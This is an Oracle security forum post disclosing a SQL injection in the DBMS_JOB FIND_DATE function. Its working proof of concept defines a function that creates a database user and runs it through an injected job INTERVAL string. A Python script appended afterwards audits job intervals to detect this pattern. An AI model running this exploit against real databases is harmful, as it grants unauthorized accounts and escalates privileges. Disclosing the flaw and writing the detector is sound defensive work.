   Pete Finnigan's Oracle Security Forum
(Moderator: Pete Finnigan)
   DBMS_JOB PACKAGE, find_date FUNCTION sql-injection
dsu
« on: Apr 9th, 2010, 8:03am »

Code:

...
  CUR := DBMS_SQL.OPEN_CURSOR;
BEGIN

  DBMS_SYS_SQL.PARSE_AS_USER( CUR, 'select sysdate, ' || INTERVAL ||
    ' from dual', DBMS_SQL.NATIVE );
...

FIND_DATE is not declared. I use the SUBMIT procedure to exploit the injection.
 
Code:

...
    MYDATE := FIND_DATE(INTERVAL);
    IF NOT NO_PARSE THEN
      PARSE_JOB(WHAT);
    END IF;

...

1. Create function.
Code:

CREATE OR REPLACE FUNCTION fff return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'create user fff identified by fff';
COMMIT;
RETURN 'sys';
END;
/

 
2. Exploit POC
Code:

DECLARE
 jobNo BINARY_INTEGER;
BEGIN
jobNo:=4242;
dbms_job.submit(jobNo, 'do_job;', TRUNC(SYSDATE+(1/24), 'HH'),'TRUNC(SYSDATE+(30/24/60),''MI'') from dual where chr(115)=sys.fff() --');
END;

 
DB Version: Oracle XE, Oracle 10gR2
The ISUBMIT procedure can be used.
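A defender-side check for the pattern in this thread, as an added example that is not part of the original post or of Oracle's code: it tokenizes job INTERVAL strings (for example exported from DBA_JOBS) and flags anything beyond a plain date expression. The allowlist, function names and sample rows are assumptions constructed for illustration.

```python
import re

# Assumption: names a scheduling date expression normally needs (extend as required).
ALLOWED_NAMES = {"SYSDATE", "SYSTIMESTAMP", "TRUNC", "ROUND", "ADD_MONTHS",
                 "NEXT_DAY", "LAST_DAY", "TO_DATE", "NULL"}

TOKEN = re.compile(r"""
    (?P<comment>--|/\*)              # comment opener hides the trailing ' from dual'
  | (?P<string>'(?:[^']|'')*')       # quoted literal such as 'MI'
  | (?P<number>\d+\.?\d*|\.\d+)
  | (?P<name>[A-Za-z_][A-Za-z0-9_$]*)
  | (?P<dot>\.)                      # schema.object reference
  | (?P<op>[-+*/(),])
  | (?P<space>\s+)
  | (?P<other>.)                     # anything else, e.g. '=' or an unclosed quote
""", re.VERBOSE | re.DOTALL)


def interval_findings(interval):
    """Return the reasons an INTERVAL string is not a plain date expression."""
    findings = []
    for m in TOKEN.finditer(interval or ""):
        kind, text = m.lastgroup, m.group()
        if kind == "comment":
            findings.append("comment marker " + text)
        elif kind == "dot":
            findings.append("qualified object reference")
        elif kind == "name" and text.upper() not in ALLOWED_NAMES:
            findings.append("unexpected identifier " + text.upper())
        elif kind == "other":
            findings.append("unexpected character " + repr(text))
    return findings


def audit_jobs(rows):
    """rows: (JOB, LOG_USER, INTERVAL) tuples; returns {job: findings} for flagged jobs."""
    flagged = {}
    for job, _log_user, interval in rows:
        findings = interval_findings(interval)
        if findings:
            flagged[job] = findings
    return flagged


# Constructed sample rows; the last interval is the string from the post above.
SAMPLE_ROWS = [
    (1, "APP", "TRUNC(SYSDATE+(30/24/60),'MI')"),
    (2, "APP", "SYSDATE + 1/24"),
    (4242, "TESTUSER",
     "TRUNC(SYSDATE+(30/24/60),'MI') from dual where chr(115)=sys.fff() --"),
]
```

The second excerpt in the post shows FIND_DATE being called when the job is submitted, so a flagged stored row is after-the-fact evidence to investigate rather than a preventive control.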